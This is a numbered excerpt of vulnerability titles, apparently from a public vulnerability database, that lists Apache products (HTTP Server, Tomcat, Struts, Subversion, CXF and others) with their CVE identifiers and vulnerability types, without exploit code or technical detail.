14081| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
14082| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
14083| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
14084| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
14085| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
14086| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
14087| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
14088| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
14089| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
14090| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
14091| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
14092| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
14093| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
14094| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
14095| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
14096| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
14097| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
14098| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
14099| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
14100| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
14101| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
14102| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
14103| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
14104| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
14105| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
14106| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
14107| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
14108| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
14109| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
14110| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
14111| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
14112| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
14113| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
14114| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
14115| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
14116| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
14117| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
14118| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
14119| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
14120| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
14121| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
14122| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
14123| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
14124| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
14125| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
14126| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
14127| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
14128| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
14129| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
14130| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
14131| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
14132| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
14133| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
14134| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
14135| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
14136| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
14137| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
14138| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
14139| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
14140| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
14141| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
14142| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
14143| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
14144| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
14145| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
14146| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
14147| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
14148| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
14149| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
14150| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
14151| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
14152| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
14153| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
14154| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
14155| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
14156| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
14157| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
14158| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
14159| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
14160| [68229] Apache Harmony PRNG Entropy Weakness
14161| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
14162| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
14163| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
14164| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
14165| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
14166| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
14167| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
14168| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
14169| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
14170| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
14171| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
14172| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
14173| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
14174| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
14175| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
14176| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
14177| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
14178| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
14179| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
14180| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
14181| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
14182| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
14183| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
14184| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
14185| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
14186| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
14187| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
14188| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
14189| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
14190| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
14191| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
14192| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
14193| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
14194| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
14195| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
14196| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
14197| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
14198| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
14199| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
14200| [64780] Apache CloudStack Unauthorized Access Vulnerability
14201| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
14202| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
14203| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
14204| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
14205| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
14206| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
14207| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
14208| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
14209| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
14210| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
14211| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
14212| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
14213| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
14214| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
14215| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
14216| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
14217| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
14218| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
14219| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
14220| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
14221| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
14222| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
14223| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
14224| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
14225| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
14226| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
14227| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
14228| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
14229| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
14230| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
14231| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
14232| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
14233| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
14234| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
14235| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
14236| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
14237| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
14238| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
14239| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
14240| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
14241| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
14242| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
14243| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
14244| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
14245| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
14246| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
14247| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
14248| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
14249| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
14250| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
14251| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
14252| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
14253| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
14254| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
14255| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
14256| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
14257| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
14258| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
14259| [59670] Apache VCL Multiple Input Validation Vulnerabilities
14260| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
14261| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
14262| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
14263| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
14264| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
14265| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
14266| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
14267| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
14268| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
14269| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
14270| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
14271| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
14272| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
14273| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
14274| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
14275| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
14276| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
14277| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
14278| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
14279| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
14280| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
14281| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
14282| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
14283| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
14284| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
14285| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
14286| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
14287| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
14288| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
14289| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
14290| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
14291| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
14292| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
14293| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
14294| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
14295| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
14296| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
14297| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
14298| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
14299| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
14300| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
14301| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
14302| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
14303| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
14304| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
14305| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
14306| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
14307| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
14308| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
14309| [54798] Apache Libcloud Man In The Middle Vulnerability
14310| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
14311| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
14312| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
14313| [54189] Apache Roller Cross Site Request Forgery Vulnerability
14314| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
14315| [53880] Apache CXF Child Policies Security Bypass Vulnerability
14316| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
14317| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
14318| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
14319| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
14320| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
14321| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
14322| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
14323| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
14324| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
14325| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
14326| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
14327| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
14328| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
14329| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
14330| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
14331| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
14332| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
14333| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
14334| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
14335| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
14336| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
14337| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
14338| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
14339| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
14340| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
14341| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
14342| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
14343| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
14344| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
14345| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
14346| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
14347| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
14348| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
14349| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
14350| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
14351| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
14352| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
14353| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
14354| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
14355| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
14356| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
14357| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
14358| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
14359| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
14360| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
14361| [49290] Apache Wicket Cross Site Scripting Vulnerability
14362| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
14363| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
14364| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
14365| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
14366| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
14367| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
14368| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
14369| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
14370| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
14371| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
14372| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
14373| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
14374| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
14375| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
14376| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
14377| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
14378| [46953] Apache MPM-ITK Module Security Weakness
14379| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
14380| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
14381| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
14382| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
14383| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
14384| [46166] Apache Tomcat JVM Denial of Service Vulnerability
14385| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
14386| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
14387| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
14388| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
14389| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
14390| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
14391| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
14392| [44616] Apache Shiro Directory Traversal Vulnerability
14393| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
14394| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
14395| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
14396| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
14397| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
14398| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
14399| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
14400| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
14401| [42492] Apache CXF XML DTD Processing Security Vulnerability
14402| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
14403| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
14404| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
14405| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
14406| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
14407| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
14408| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
14409| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
14410| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
14411| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
14412| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
14413| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
14414| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
14415| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
14416| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
14417| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
14418| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
14419| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
14420| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
14421| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
14422| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
14423| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
14424| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
14425| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
14426| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
14427| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
14428| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
14429| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
14430| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
14431| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
14432| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
14433| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
14434| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
14435| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
14436| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
14437| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
14438| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
14439| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
14440| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
14441| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
14442| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
14443| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
14444| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
14445| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
14446| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
14447| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
